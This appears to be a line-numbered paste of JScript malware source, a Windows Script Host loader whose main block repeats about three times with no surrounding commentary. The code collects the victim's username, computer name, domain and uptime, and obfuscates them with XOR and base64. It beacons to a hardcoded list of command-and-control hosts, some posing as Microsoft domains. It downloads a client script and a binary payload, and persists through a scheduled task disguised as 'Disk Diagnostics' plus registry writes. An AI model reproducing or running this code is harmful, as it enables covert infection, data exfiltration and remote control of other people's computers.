897. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
898. }
899.  
900.  
901. function Base64text(string){
902. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
903. var element = XmlDOM.createElement("tempContainer");
904. element.dataType = "bin.Base64";
905. element.text = string;
906.  
907. var stream = WScript.CreateObject("ADODB.Stream");
908. stream.Type = 1;
909. stream.Open();
910. stream.Write(element.nodeTypedValue);
911.  
912. stream.Position = 0;
913. stream.Type = 2;
914. stream.CharSet = "utf-8";
915.  
916. return stream.ReadText();
917. }
918.  
919. function StringToBinary(string){
920. var BinaryStream = new ActiveXObject("ADODB.Stream");
921. BinaryStream.Type = 2;
922. BinaryStream.CharSet = "ascii";
923. BinaryStream.Open();
924. BinaryStream.WriteText(string);
925. BinaryStream.Position = 0;
926. BinaryStream.Type = 1;
927. BinaryStream.Position = 0;
928. return BinaryStream.Read();
929. }
930.  
931.  
932. function Base64bytes(string){
933. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
934. var element = XmlDOM.createElement("Base64Data");
935. element.dataType = "bin.base64";
936.  
937. element.text = string;
938.  
939. var stream = WScript.CreateObject("ADODB.Stream");
940. stream.Type = 1;
941. stream.Open();
942.  
943. stream.Write(element.nodeTypedValue);
944. return stream;
945. }
946.  
947. function Base64Encode(string) {
948.  
949. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
950. var element = XmlDOM.createElement("Base64Data");
951. element.dataType = "bin.base64";
952.  
953. element.nodeTypedValue = StringToBinary(string);
954.  
955. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
956. }
957.  
958.  
959. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
960. Loader.DeployClient();
961. }
962. var config = {
963. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
964. SOFT_SIG : 'mad29',
965. SOFT_VERSION: 32,
966. C2_REQUEST_SLEEP : 21,
967. C2_FAIL_SLEEP : 21,
968. C2_FAIL_COUNT : 20,
969. C2_OB_KEY : 'JxTRG4mY',
970.  
971.  
972. C2_PREFIX : 'rpc.aspx'
973. }
974.  
975.  
976. var SELECTED_C2 = config.PRIMARY_C2[0];
977.  
978.  
979. Math.imul = function (a, b) {
980. var ah = (a >>> 16) & 0xffff;
981. var al = a & 0xffff;
982. var bh = (b >>> 16) & 0xffff;
983. var bl = b & 0xffff;
984. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
985. };
986.  
987.  
988. var GlobalStrings = {
989. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
990. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
991. WMIC_EXEC : "wmic process call create \"%path%\"",
992. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
993. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
994. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
995. ADS_SSID : "HDDScan",
996. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
997. TASK_NAME : "Disk Diagnostics"
998. }
999.  
1000.  
1001. var ObjectProducer = {}
1002. ObjectProducer.AccesibleObjects = {
1003. MAIN_SH_OBJECT : 'WScript.Shell',
1004. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
1005. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
1006. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
1007. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
1008. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
1009. };
1010.  
1011. ObjectProducer.GetRootConstructor = function(){
1012. return ActiveXObject;
1013. }
1014.  
1015. ObjectProducer.GetInstance = function(instanceKey){
1016. var rootConstructor = ObjectProducer.GetRootConstructor();
1017. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
1018. }
1019.  
1020.  
1021.  
1022. var DataTools = {};
1023. DataTools.KEY_BASE = 1029;
1024.  
1025. DataTools.DeriveKey = function(keyStr){
1026. var keyBase = DataTools.KEY_BASE;
1027. var key = 0;
1028.  
1029. for(var i = 0; i < keyStr.length; i++){
1030. keyBase = keyBase ^ keyStr.charCodeAt(i);
1031. }
1032.  
1033. var _keyBase = keyBase.toString();
1034. for(var i = 0; i < _keyBase.length; i++){
1035. key += parseInt(_keyBase.charAt(i));
1036. }
1037.  
1038. return key;
1039. }
1040.  
1041. DataTools.RotString = function(str, key){
1042. var rotd = "";
1043. for(var i = 0; i < str.length; i++){
1044. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
1045. }
1046.  
1047. return rotd;
1048. }
1049.  
1050. DataTools.Hash = function(str){
1051. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
1052. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
1053.  
1054. return ((h ^ h >>> 16) >>> 0).toString(16);
1055. }
1056.  
1057. DataTools.Random = {};
1058. DataTools.Random.Number = function(min, max){
1059. min = Math.ceil(min);
1060. max = Math.floor(max);
1061. return Math.floor(Math.random() * (max - min + 1)) + min;
1062. }
1063.  
1064. DataTools.Random.String = function(len){
1065. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
1066. var result = "";
1067. for(var i = 0; i < len; i++){
1068. var chr = DataTools.Random.Number(0, alphabet.length-1);
1069. result = result.concat(alphabet.charAt(chr));
1070. }
1071.  
1072. return result;
1073. }
1074.  
1075.  
1076. DataTools.Strings = {};
1077. DataTools.Strings.ParseTemplate = function(str, templateStr){
1078. var template = templateStr.split('&');
1079. for(var i = 0; i < template.length; i++){
1080. var keyValue = template[i].split('=');
1081. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
1082. }
1083.  
1084. return str;
1085. }
1086.  
1087. var Windows = {};
1088. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
1089. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
1090.  
1091. Windows.Execute = function(command){
1092. Windows.CoMainObject.Run(command);
1093. }
1094.  
1095. Windows.GetEnv = function(env){
1096. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
1097. }
1098.  
1099. Windows.RegRead = function(path){
1100. return Windows.CoMainObject.RegRead(path);
1101. }
1102.  
1103. Windows.RegWrite = function(entry, value){
1104. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
1105. }
1106.  
1107. Windows.CreateFile = function(path){
1108. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
1109. fHandle.WriteLine(DataTools.Random.String(1024));
1110. fHandle.Close();
1111. }
1112.  
1113. Windows.AppendDataStream = function(path, stream, data){
1114. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
1115. fHandle.WriteLine(data);
1116. fHandle.Close();
1117. }
1118.  
1119. Windows.AppendDataStreamB = function(path, stream, data){
1120. data.SaveToFile(path.concat(":").concat(stream), 2);
1121. data.Close();
1122. }
1123.  
1124. Windows.WriteData = function(path, data){
1125. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
1126. fHandle.Write(data);
1127. fHandle.Close();
1128. }
1129.  
1130. Windows.WriteBytes = function(path, data){
1131. data.SaveToFile(path, 2);
1132. data.Close();
1133. }
1134.  
1135. Windows.WriteDataStreamBytes = function(path, stream, data){
1136. data.SaveToFile(path.concat(":").concat(stream), 2);
1137. data.Close();
1138. }
1139.  
1140. Windows.ReadFile = function(path){
1141. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
1142. return fHandle.ReadAll();
1143. }
1144.  
1145. Windows.GetWMIProvider = function(pcname){
1146. return GetObject("winmgmts:"+
1147. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
1148. }
1149.  
1150. Windows.GetUptime = function(){
1151. try{
1152. var wmi = Windows.GetWMIProvider(".");
1153. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
1154. var e = new Enumerator(queryResult);
1155.  
1156. return parseInt(e.item().SystemUpTime);
1157. }catch(e){
1158. return 0;
1159. }
1160. }
1161.  
1162. Windows.GetArch = function(){
1163. var architecture = "64";
1164. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
1165.  
1166. if(product.indexOf('Windows 7') != -1){
1167. architecture = "32";
1168. }
1169.  
1170. return architecture;
1171. }
1172.  
1173.  
1174. var Http = {};
1175. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
1176. Http.Request = function(url){
1177. try{
1178. Http.Client.Open('GET', url, false);
1179. Http.Client.Send();
1180.  
1181. if(Http.Client.Status == 200)
1182. return Http.Client.ResponseText;
1183. else
1184. return "";
1185. }catch(e){
1186. return ""
1187. }
1188. }
1189.  
1190.  
1191. var Loader = {};
1192. Loader.USERNAME = Windows.GetEnv("%username%");
1193. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
1194. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
1195. Loader.Uptime = Windows.GetUptime();
1196. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
1197.  
1198. Loader.GetUid = function(){
1199. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
1200. }
1201.  
1202. Loader.GetInitialRequest = function(nonce){
1203. var uid = Loader.GetUid();
1204. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
1205.  
1206. var sessionKey = nonce + config.C2_OB_KEY;
1207. request = request.join(":");
1208. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
1209. request = Base64Encode(request);
1210.  
1211. return encodeURIComponent(request);
1212. }
1213.  
1214. Loader.GetInitialEndpoint = function(){
1215. var nonce = DataTools.Random.String(12)
1216. var request = Loader.GetInitialRequest(nonce);
1217.  
1218. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
1219. return endpoint;
1220. }
1221.  
1222. Loader.DeployHost = function(){
1223. var temp = Windows.GetEnv("%temp%");
1224. var architecture = Windows.GetArch();
1225. var nonce = DataTools.Random.String(12);
1226. var uid = Loader.GetUid();
1227. var sessionKey = nonce + config.C2_OB_KEY;
1228.  
1229. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
1230. encodedId = Base64Encode(encodedId);
1231. encodedId = encodeURIComponent(encodedId);
1232.  
1233. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
1234. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
1235.  
1236. var filename = uid.concat(".bin");
1237.  
1238. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
1239. return temp.concat("\\").concat(filename);
1240.  
1241. }
1242.  
1243. Loader.DeployClient = function() {
1244. if (Loader.Uptime <= 3000) {
1245. WScript.Quit(0);
1246. }
1247.  
1248. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
1249. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
1250. try {
1251. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
1252. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
1253.  
1254. if (response.indexOf('<<<CLIENT__') !== -1) {
1255. var client = response.replace('<<<CLIENT__', '');
1256. client = Base64text(client);
1257.  
1258. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
1259. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
1260.  
1261. SELECTED_C2 = config.PRIMARY_C2[j];
1262. Loader.Persist(client);
1263. return;
1264.  
1265. }
1266. } catch (e) {
1267.  
1268. }
1269.  
1270. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
1271. }
1272. }
1273. }
1274.  
1275. Loader.Persist = function(client){
1276.  
1277. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
1278. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
1279.  
1280. Windows.Execute(taskCommand);
1281. Windows.RegWrite("ServerUrl", client);
1282. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
1283.  
1284. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
1285.  
1286. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
1287.  
1288. Loader.DeployHost();
1289. }
1290.  
1291. function debug(message){
1292. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
1293. }
1294.  
1295.  
1296. function Base64text(string){
1297. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
1298. var element = XmlDOM.createElement("tempContainer");
1299. element.dataType = "bin.Base64";
1300. element.text = string;
1301.  
1302. var stream = WScript.CreateObject("ADODB.Stream");
1303. stream.Type = 1;
1304. stream.Open();
1305. stream.Write(element.nodeTypedValue);
1306.  
1307. stream.Position = 0;
1308. stream.Type = 2;
1309. stream.CharSet = "utf-8";
1310.  
1311. return stream.ReadText();
1312. }
1313.  
1314. function StringToBinary(string){
1315. var BinaryStream = new ActiveXObject("ADODB.Stream");
1316. BinaryStream.Type = 2;
1317. BinaryStream.CharSet = "ascii";
1318. BinaryStream.Open();
1319. BinaryStream.WriteText(string);
1320. BinaryStream.Position = 0;
1321. BinaryStream.Type = 1;
1322. BinaryStream.Position = 0;
1323. return BinaryStream.Read();
1324. }
1325.  
1326.  
1327. function Base64bytes(string){
1328. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
1329. var element = XmlDOM.createElement("Base64Data");
1330. element.dataType = "bin.base64";
1331.  
1332. element.text = string;
1333.  
1334. var stream = WScript.CreateObject("ADODB.Stream");
1335. stream.Type = 1;
1336. stream.Open();
1337.  
1338. stream.Write(element.nodeTypedValue);
1339. return stream;
1340. }
1341.  
1342. function Base64Encode(string) {
1343.  
1344. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
1345. var element = XmlDOM.createElement("Base64Data");
1346. element.dataType = "bin.base64";
1347.  
1348. element.nodeTypedValue = StringToBinary(string);
1349.  
1350. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
1351. }
1352.  
1353.  
1354. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
1355. Loader.DeployClient();
1356. }
1357. var config = {
1358. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
1359. SOFT_SIG : 'mad29',
1360. SOFT_VERSION: 32,
1361. C2_REQUEST_SLEEP : 21,
1362. C2_FAIL_SLEEP : 21,
1363. C2_FAIL_COUNT : 20,
1364. C2_OB_KEY : 'JxTRG4mY',
1365.  
1366.  
1367. C2_PREFIX : 'rpc.aspx'
1368. }
1369.  
1370.  
1371. var SELECTED_C2 = config.PRIMARY_C2[0];
1372.  
1373.  
1374. Math.imul = function (a, b) {
1375. var ah = (a >>> 16) & 0xffff;
1376. var al = a & 0xffff;
1377. var bh = (b >>> 16) & 0xffff;
1378. var bl = b & 0xffff;
1379. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
1380. };
1381.  
1382.  
1383. var GlobalStrings = {
1384. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
1385. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
1386. WMIC_EXEC : "wmic process call create \"%path%\"",
1387. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
1388. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
1389. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
1390. ADS_SSID : "HDDScan",
1391. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
1392. TASK_NAME : "Disk Diagnostics"
1393. }
1394.  
1395.  
1396. var ObjectProducer = {}
1397. ObjectProducer.AccesibleObjects = {
1398. MAIN_SH_OBJECT : 'WScript.Shell',
1399. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
1400. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
1401. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
1402. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
1403. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
1404. };
1405.  
1406. ObjectProducer.GetRootConstructor = function(){
1407. return ActiveXObject;
1408. }
1409.  
1410. ObjectProducer.GetInstance = function(instanceKey){
1411. var rootConstructor = ObjectProducer.GetRootConstructor();
1412. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
1413. }
1414.  
1415.  
1416.  
1417. var DataTools = {};
1418. DataTools.KEY_BASE = 1029;
1419.  
1420. DataTools.DeriveKey = function(keyStr){
1421. var keyBase = DataTools.KEY_BASE;
1422. var key = 0;
1423.  
1424. for(var i = 0; i < keyStr.length; i++){
1425. keyBase = keyBase ^ keyStr.charCodeAt(i);
1426. }
1427.  
1428. var _keyBase = keyBase.toString();
1429. for(var i = 0; i < _keyBase.length; i++){
1430. key += parseInt(_keyBase.charAt(i));
1431. }
1432.  
1433. return key;
1434. }
1435.  
1436. DataTools.RotString = function(str, key){
1437. var rotd = "";
1438. for(var i = 0; i < str.length; i++){
1439. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
1440. }
1441.  
1442. return rotd;
1443. }
1444.  
1445. DataTools.Hash = function(str){
1446. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
1447. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
1448.  
1449. return ((h ^ h >>> 16) >>> 0).toString(16);
1450. }
1451.  
1452. DataTools.Random = {};
1453. DataTools.Random.Number = function(min, max){
1454. min = Math.ceil(min);
1455. max = Math.floor(max);
1456. return Math.floor(Math.random() * (max - min + 1)) + min;
1457. }
1458.  
1459. DataTools.Random.String = function(len){
1460. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
1461. var result = "";
1462. for(var i = 0; i < len; i++){
1463. var chr = DataTools.Random.Number(0, alphabet.length-1);
1464. result = result.concat(alphabet.charAt(chr));
1465. }
1466.  
1467. return result;
1468. }
1469.  
1470.  
1471. DataTools.Strings = {};
1472. DataTools.Strings.ParseTemplate = function(str, templateStr){
1473. var template = templateStr.split('&');
1474. for(var i = 0; i < template.length; i++){
1475. var keyValue = template[i].split('=');
1476. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
1477. }
1478.  
1479. return str;
1480. }
1481.  
1482. var Windows = {};
1483. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
1484. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
1485.  
1486. Windows.Execute = function(command){
1487. Windows.CoMainObject.Run(command);
1488. }
1489.  
1490. Windows.GetEnv = function(env){
1491. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
1492. }
1493.  
1494. Windows.RegRead = function(path){
1495. return Windows.CoMainObject.RegRead(path);
1496. }
1497.  
1498. Windows.RegWrite = function(entry, value){
1499. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
1500. }
1501.  
1502. Windows.CreateFile = function(path){
1503. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
1504. fHandle.WriteLine(DataTools.Random.String(1024));
1505. fHandle.Close();
1506. }
1507.  
1508. Windows.AppendDataStream = function(path, stream, data){
1509. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
1510. fHandle.WriteLine(data);
1511. fHandle.Close();
1512. }
1513.  
1514. Windows.AppendDataStreamB = function(path, stream, data){
1515. data.SaveToFile(path.concat(":").concat(stream), 2);
1516. data.Close();
1517. }
1518.  
1519. Windows.WriteData = function(path, data){
1520. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
1521. fHandle.Write(data);
1522. fHandle.Close();
1523. }
1524.  
1525. Windows.WriteBytes = function(path, data){
1526. data.SaveToFile(path, 2);
1527. data.Close();
1528. }
1529.  
1530. Windows.WriteDataStreamBytes = function(path, stream, data){
1531. data.SaveToFile(path.concat(":").concat(stream), 2);
1532. data.Close();
1533. }
1534.  
1535. Windows.ReadFile = function(path){
1536. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
1537. return fHandle.ReadAll();
1538. }
1539.  
1540. Windows.GetWMIProvider = function(pcname){
1541. return GetObject("winmgmts:"+
1542. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
1543. }
1544.  
1545. Windows.GetUptime = function(){
1546. try{
1547. var wmi = Windows.GetWMIProvider(".");
1548. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
1549. var e = new Enumerator(queryResult);
1550.  
1551. return parseInt(e.item().SystemUpTime);
1552. }catch(e){
1553. return 0;
1554. }
1555. }
1556.  
1557. Windows.GetArch = function(){
1558. var architecture = "64";
1559. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
1560.  
1561. if(product.indexOf('Windows 7') != -1){
1562. architecture = "32";
1563. }
1564.  
1565. return architecture;
1566. }
1567.  
1568.  
1569. var Http = {};
1570. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
1571. Http.Request = function(url){
1572. try{
1573. Http.Client.Open('GET', url, false);
1574. Http.Client.Send();
1575.  
1576. if(Http.Client.Status == 200)
1577. return Http.Client.ResponseText;
1578. else
1579. return "";
1580. }catch(e){
1581. return ""
1582. }
1583. }
1584.  
1585.  
1586. var Loader = {};
1587. Loader.USERNAME = Windows.GetEnv("%username%");
1588. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
1589. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
1590. Loader.Uptime = Windows.GetUptime();
1591. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
1592.  
1593. Loader.GetUid = function(){
1594. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
1595. }
1596.  
1597. Loader.GetInitialRequest = function(nonce){
1598. var uid = Loader.GetUid();
1599. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
1600.  
1601. var sessionKey = nonce + config.C2_OB_KEY;
1602. request = request.join(":");
1603. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
1604. request = Base64Encode(request);
1605.  
1606. return encodeURIComponent(request);
1607. }
1608.  
1609. Loader.GetInitialEndpoint = function(){
1610. var nonce = DataTools.Random.String(12)
1611. var request = Loader.GetInitialRequest(nonce);
1612.  
1613. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
1614. return endpoint;
1615. }
1616.  
1617. Loader.DeployHost = function(){
1618. var temp = Windows.GetEnv("%temp%");
1619. var architecture = Windows.GetArch();
1620. var nonce = DataTools.Random.String(12);
1621. var uid = Loader.GetUid();
1622. var sessionKey = nonce + config.C2_OB_KEY;
1623.  
1624. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
1625. encodedId = Base64Encode(encodedId);
1626. encodedId = encodeURIComponent(encodedId);
1627.  
1628. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
1629. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
1630.  
1631. var filename = uid.concat(".bin");
1632.  
1633. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
1634. return temp.concat("\\").concat(filename);
1635.  
1636. }
1637.  
1638. Loader.DeployClient = function() {
1639. if (Loader.Uptime <= 3000) {
1640. WScript.Quit(0);
1641. }
1642.  
1643. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
1644. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
1645. try {
1646. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
1647. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
1648.  
1649. if (response.indexOf('<<<CLIENT__') !== -1) {
1650. var client = response.replace('<<<CLIENT__', '');
1651. client = Base64text(client);
1652.  
1653. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
1654. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
1655.  
1656. SELECTED_C2 = config.PRIMARY_C2[j];
1657. Loader.Persist(client);
1658. return;
1659.  
1660. }
1661. } catch (e) {
1662.  
1663. }
1664.  
1665. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
1666. }
1667. }
1668. }
1669.  
1670. Loader.Persist = function(client){
1671.  
1672. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
1673. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
1674.  
1675. Windows.Execute(taskCommand);
1676. Windows.RegWrite("ServerUrl", client);
1677. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
1678.  
1679. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
1680.  
1681. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
1682.  
1683. Loader.DeployHost();
1684. }
1685.  
1686. function debug(message){
1687. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
1688. }
1689.  
1690.  
1691. function Base64text(string){
1692. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
1693. var element = XmlDOM.createElement("tempContainer");
1694. element.dataType = "bin.Base64";
1695. element.text = string;
1696.  
1697. var stream = WScript.CreateObject("ADODB.Stream");
1698. stream.Type = 1;
1699. stream.Open();
1700. stream.Write(element.nodeTypedValue);
1701.  
1702. stream.Position = 0;
1703. stream.Type = 2;
1704. stream.CharSet = "utf-8";
1705.  
1706. return stream.ReadText();
1707. }
1708.  
1709. function StringToBinary(string){
1710. var BinaryStream = new ActiveXObject("ADODB.Stream");
1711. BinaryStream.Type = 2;
1712. BinaryStream.CharSet = "ascii";
1713. BinaryStream.Open();
1714. BinaryStream.WriteText(string);
1715. BinaryStream.Position = 0;
1716. BinaryStream.Type = 1;
1717. BinaryStream.Position = 0;
1718. return BinaryStream.Read();
1719. }
1720.  
1721.  
1722. function Base64bytes(string){
1723. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
1724. var element = XmlDOM.createElement("Base64Data");
1725. element.dataType = "bin.base64";
1726.  
1727. element.text = string;
1728.  
1729. var stream = WScript.CreateObject("ADODB.Stream");
1730. stream.Type = 1;
1731. stream.Open();
1732.  
1733. stream.Write(element.nodeTypedValue);
1734. return stream;
1735. }
1736.  
1737. function Base64Encode(string) {
1738.  
1739. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
1740. var element = XmlDOM.createElement("Base64Data");
1741. element.dataType = "bin.base64";
1742.  
1743. element.nodeTypedValue = StringToBinary(string);
1744.  
1745. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
1746. }
1747.  
1748.  
1749. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
1750. Loader.DeployClient();
1751. }
1752. var config = {
1753. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
1754. SOFT_SIG : 'mad29',
1755. SOFT_VERSION: 32,
1756. C2_REQUEST_SLEEP : 21,
1757. C2_FAIL_SLEEP : 21,
1758. C2_FAIL_COUNT : 20,
1759. C2_OB_KEY : 'JxTRG4mY',
1760.  
1761.  
1762. C2_PREFIX : 'rpc.aspx'
1763. }
1764.  
1765.  
1766. var SELECTED_C2 = config.PRIMARY_C2[0];
1767.  
1768.  
1769. Math.imul = function (a, b) {
1770. var ah = (a >>> 16) & 0xffff;
1771. var al = a & 0xffff;
1772. var bh = (b >>> 16) & 0xffff;
1773. var bl = b & 0xffff;
1774. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
